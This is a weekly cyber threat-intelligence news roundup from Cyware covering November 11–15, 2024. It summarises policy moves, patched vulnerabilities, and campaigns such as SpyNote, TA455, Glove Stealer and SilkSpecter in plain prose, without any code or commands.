We use cookies to improve your experience. Do you accept?

Skip to main content

Cyware Weekly Threat Intelligence - November 11–15

shutterstock_2053715180

Weekly Threat Briefing Nov 15, 2024

The Good

As cyber threats to critical infrastructure surge, the TSA has proposed formal rules for pipeline and railroad operators, while the World Economic Forum introduced a new framework to enhance public-private collaboration against cybercrime. These efforts highlight the urgency of uniting resources and governance to fortify cybersecurity resilience on all fronts.

  • The Transportation Security Administration (TSA) has proposed new rules to formalize existing security directives for pipeline and railroad operators in response to cyber threats. The rules would require operators to report cyber incidents, create cyber risk management plans overseen by TSA, and incur an estimated $2.1 billion in costs over 10 years. TSA aims to increase cybersecurity resilience due to the increasing cyber threats to critical transportation infrastructure, which have been attributed to nation-state actors. The proposed rules are open for industry input until February 5, reflecting TSA's efforts to balance flexibility for operators while addressing the evolving cyber threats.
  • Italy conducted the annual Blueprint Operational Level Exercise (Blue OLEx) to test EU institutions' readiness for cyber-attacks. The exercise involved senior cybersecurity officials from EU member states and the Commission, focusing on improving responses to incidents and crises. Blue OLEx emphasized executive-level cooperation through the Cyber Crisis Liaison Organization Network (EU-CyCLONe), established by the NIS2 Directive. The event was hosted by the Italian Cybersecurity Agency (ACN), emphasizing the importance of sharing ideas and strengthening ties among crisis management leaders.
  • The World Economic Forum's Partnership against Cybercrime released a framework to enhance collaboration between the cybersecurity industry and the public sector. The framework emphasizes the need for incentives, good governance, and resources to support operational collaborations. It highlights the importance of clear missions, impact, peer-to-peer learning, and public recognition as incentives for organizations to collaborate. Additionally, it emphasizes the need for flexible governance frameworks, membership capability assessments, and data normalization to ensure a cohesive response to cyber threats.

The Bad

From Microsoft’s patching of critical flaws to nation-state campaigns, the week reveals no respite in cybersecurity. The WIRTE group expanded disruptive attacks across the Middle East, whereas TA455 targeted aerospace firms with fake job lures. Microsoft’s November 2024 Patch Tuesday updates addressed 89 vulnerabilities, including two actively exploited zero-days, underscoring escalating threats to global IT systems. 

  • CYFIRMA analyzed SpyNote, an Android malware that poses a significant threat by allowing extensive control over infected devices. The malware hides itself as a fake antivirus named Avast Mobile Security for Android to deceive users. The malware targets cryptocurrencies, steals data from other apps, and collects user credentials. It monitors network traffic to connect to a C2 server for data theft. There are over 10,000 identified samples of SpyNote, with recent infections linked to the threat actor EVLF distributing it through platforms like Telegram.
  • The Iranian Dream Job campaign conducted by TA455 targeted the aerospace industry by offering fake jobs and distributing the SnailResin malware. The campaign has been active since at least September 2023 and uses fake recruiting websites and LinkedIn profiles to distribute malicious files. The attackers use a detailed PDF guide to encourage victims to download a ZIP file containing the malware. The campaign is suspected to be involved in espionage targeting aerospace, aviation, and defense industries in Middle Eastern countries.
  • Microsoft released fixes for 89 CVE-listed security flaws in its products, with two zero-day vulnerabilities actively under attack. One flaw, CVE-2024-49039, allows privilege escalation through Windows Task Scheduler, while the second flaw, CVE-2024-43451, impacts NTLM hashes. Azure CycleCloud users should be aware of CVE-2024-43602, which permits remote code execution. Additionally, a serious flaw, CVE-2024-43498, affects . NET and Visual Studio, and another critical vulnerability, CVE-2024-43639, involves a cryptographic protocol vulnerability in Windows Kerberos.
  • The Google Chrome team has released Chrome 131, now available for Windows, Mac, and Linux. Among the changes are 12 security fixes, including ones reported by external researchers. These fixes address issues like inappropriate implementation in Blink, Autofill, Media, Accessibility, Views, Navigation, Paint, and FileSystem. Additionally, internal security work has led to a range of fixes.
  • The WIRTE APT group, associated with the Hamas-affiliated group Gaza Cybergang, has continued its attacks in the Middle East. It has expanded its focus from espionage to disruptive attacks while targeting entities in the Palestinian Authority, Jordan, Iraq, Egypt, and Saudi Arabia. Researchers uncovered a connection between the malware used by WIRTE and SameCoin, a wiper malware that attacked Israeli targets in 2024. The APT group has also included hack-and-leak operations and is using cyber capabilities to shape narratives.
  • The CISA issued a warning about two new vulnerabilities in the Palo Alto Networks Expedition software, which are being actively exploited. They have been added to the KEV catalog. The vulnerabilities are OS Command Injection (CVE-2024-9463) and SQL Injection (CVE-2024-9465), which can allow unauthorized access to run commands as root or expose database contents, potentially revealing sensitive information like usernames, passwords, configurations, and keys. Palo Alto Networks addressed these in an update on October 9.

New Threats

This week, several emerging threats highlighted the diversity of attack tactics. The new Glove Stealer exploits browser encryption to pilfer cookies and crypto wallets, whereas the Lazarus group’s RustyAttr trojan targets macOS users using the Tauri framework. A Chinese threat actor, SilkSpecter, was found scamming online shoppers via 4,695 fake domains, impersonating popular brands to steal credit card details during Black Friday hunts.

  • Researchers have discovered a tool, GoIssue, that can steal developer credentials in bulk and conduct malicious activities, including supply chain attacks. GoIssue gathers email addresses from public GitHub profiles by using automated processes and GitHub tokens, allowing attackers to send bulk emails directly to user inboxes. The tool is being marketed to potential attackers for $700 for a custom build or $3,000 for full source code access. It combines bulk email capabilities with data collection features and hides the attacker's identity through proxy networks.
  • The new Glove Stealer malware was found to bypass Google Chrome's Application-Bound encryption to steal browser cookies. The malware is simple and lacks protection mechanisms, suggesting it is in the early stages of development. The threat actors behind the malware use social engineering tactics to trick victims into installing it. The malware can extract cookies from Firefox and Chromium-based browsers, as well as steal cryptocurrency wallets, 2FA tokens, passwords, and emails. 
  • APT41, a threat group from China, is using a sophisticated Windows-based surveillance toolkit in a cyberespionage campaign targeting organizations in South Asia. The toolkit, called DeepData Framework, consists of 12 separate plugins optimized for malicious functions. These plugins steal communications from various messaging apps, system information, browsing history, cookies, passwords, audio files, and more.
  • Threat actors are using a new method on macOS to spread a malware called RustyAttr, which is linked to the Lazarus Group from North Korea. The malware is built using the Tauri framework and includes an extended attribute that runs a shell script. When executed, a decoy distraction is displayed. The shell script executes a Rust backend via a malicious JavaScript loaded on a fake webpage. 
  • Unit 42 researchers discovered a group of North Korean IT workers, referred to as CL-STA-0237, involved in phishing attacks using malware-infected video conference apps, operating primarily from Laos. This group exploited a U.S.-based IT services company to apply for jobs and succeeded in getting hired by a major tech company in 2022. The team found newly registered domains linked to a known IP address associated with the MiroTalk fake job campaign, revealing that CL-STA-0237 exploited information and controlled multiple accounts belonging to the U.S.-based IT company. 
  • A Chinese threat actor named SilkSpecter is running a scam using fake online stores to steal credit card information from shoppers in the U.S. and Europe. SilkSpecter operates 4,695 fake domains impersonating popular brands like North Face, Lidl, and Ikea. The scam uses domain names containing "Black Friday" to target bargain hunters. Sites adjust language based on location using Google Translate. They use legitimate payment processor Stripe to appear trustworthy while stealing card details. SilkSpecter tracks visitors' behavior with tools like OpenReplay and uses phishing kits to steal card information. The scam may use stolen phone numbers for two-factor authentication in future attacks.

Related Threat Briefings

Dec 20, 2024

Cyware Weekly Threat Intelligence, December 16–20, 2024

In a digital age where borders are blurred, governments are sharpening their strategies to outpace cyber adversaries. The draft update to the National Cyber Incident Response Plan (NCIRP) introduces a comprehensive framework for managing nationwide cyberattacks that impact critical infrastructure and the economy. Meanwhile, the fiscal year 2025 defense policy bill, recently approved by the Senate, emphasizes strengthening cybersecurity measures both at home and abroad. A deceptive health app on the Amazon Appstore turned out to be a Trojan horse for spyware. Masquerading as BMI CalculationVsn, the app recorded device screens, intercepted SMS messages, and scanned for installed apps to steal sensitive data. Malicious extensions targeting developers and cryptocurrency projects have infiltrated the VSCode marketplace and NPM. Disguised as productivity tools, these extensions employed downloader functionality to deliver obfuscated PowerShell payloads. The BADBOX botnet has resurfaced, compromising over 192,000 Android devices, including high-end smartphones and smart TVs, directly from the supply chain. Industrial control systems are facing heightened risks as malware like Ramnit and Chaya_003 targets engineering workstations from Mitsubishi and Siemens. Both malware families exploit legitimate services, complicating detection and mitigation efforts in ICS environments. The Chinese hacking group Winnti has been leveraging a PHP backdoor called Glutton, targeting organizations in China and the U.S. This modular ELF-based malware facilitates tailored attacks across industries and even embeds itself into software packages to compromise other cybercriminals. A tax-themed phishing campaign, dubbed FLUX#CONSOLE, is deploying backdoor payloads to compromise systems in Pakistan. Threat actors employ phishing emails with double-extension files masquerading as PDFs.

Dec 13, 2024

Cyware Weekly Threat Intelligence, December 09–13, 2024

Cybercrime’s web of deception unraveled in South Korea as authorities dismantled a fraud network responsible for extorting $6.3 million through fake online trading platforms. Dubbed Operation Midas, the effort led to the arrest of 32 individuals and the seizure of 20 servers. In a significant move to combat surveillance abuses, the U.S. defense policy bill for 2025 introduced measures to shield military and diplomatic personnel from commercial spyware threats. The legislation calls for stringent cybersecurity standards, a review of spyware incidents, and regular reporting to Congress. The subtle art of deception found a new stage with a Microsoft Teams call, as attackers used social engineering to manipulate victims into granting remote access. By convincing users to install AnyDesk, they gained control of systems, executing commands to download the DarkGate malware. Russian APT Secret Blizzard has resurfaced and used the Amadey bot to infiltrate Ukrainian military devices and deploy their Tavdig backdoor. In a phishing spree dubbed "Aggressive Inventory Zombies (AIZ)," scammers impersonated brands like Etsy, Amazon, and Binance to target retail and crypto audiences. Surveillance has reached unsettling new depths with the discovery of BoneSpy and PlainGnome, two spyware families linked to the Russian group Gamaredon. Designed for extensive espionage, these Android malware tools track GPS, capture audio, and harvest data. A new Android banking trojan has already caused havoc among Indian users, masquerading as utility and banking apps to steal sensitive financial information. With 419 devices compromised, the malware intercepts SMS messages, exfiltrates personal data via Supabase, and even tricks victims into entering details under the pretense of bill payment. Iranian threat actors have set their sights on critical infrastructure, deploying IOCONTROL malware to infiltrate IoT and OT/SCADA systems in Israel and the U.S.

Dec 6, 2024

Cyware Weekly Threat Intelligence, December 02–06, 2024

NIST sharpened the tools for organizations to measure their cybersecurity readiness, addressing both technical and leadership challenges. The two-volume guidance blends data-driven assessments with managerial insights, emphasizing the critical role of leadership in applying findings. The Manson Market, a notorious hub for phishing networks, fell in a sweeping Europol-led takedown. With over 50 servers seized and 200TB of stolen data recovered, the operation spanned multiple countries, including Germany and Austria. Russian APT group BlueAlpha leveraged Cloudflare Tunnels to cloak its GammaDrop malware campaign from prying eyes. The group deployed HTML smuggling and DNS fast-fluxing to bypass detection, targeting Ukrainian organizations with precision. Earth Minotaur intensified its surveillance operations against Tibetan and Uyghur communities through the MOONSHINE exploit kit. The kit, now updated with newer exploits, enables the installation of the DarkNimbus backdoor on Android and Windows devices. Cloudflare Pages became an unwitting ally in the sharp rise of phishing campaigns, with a staggering 198% increase in abuse cases. Cybercriminals exploited the platform's infrastructure to host malicious pages, fueling a surge from 460 incidents in 2023 to over 1,370 by October 2024. DroidBot has quietly infiltrated over 77 cryptocurrency exchanges and banking apps, building a web of theft across Europe. Active since June 2024, this Android malware operates as a MaaS platform, enabling affiliates to tailor attacks. Rockstar 2FA, a phishing platform targeting Microsoft 365 users, has set the stage for large-scale credential theft. With over 5,000 phishing domains launched, the platform is marketed on Telegram. The Gafgyt malware is shifting gears, targeting exposed Docker Remote API servers through legitimate Docker images, creating botnets capable of launching DDoS attacks.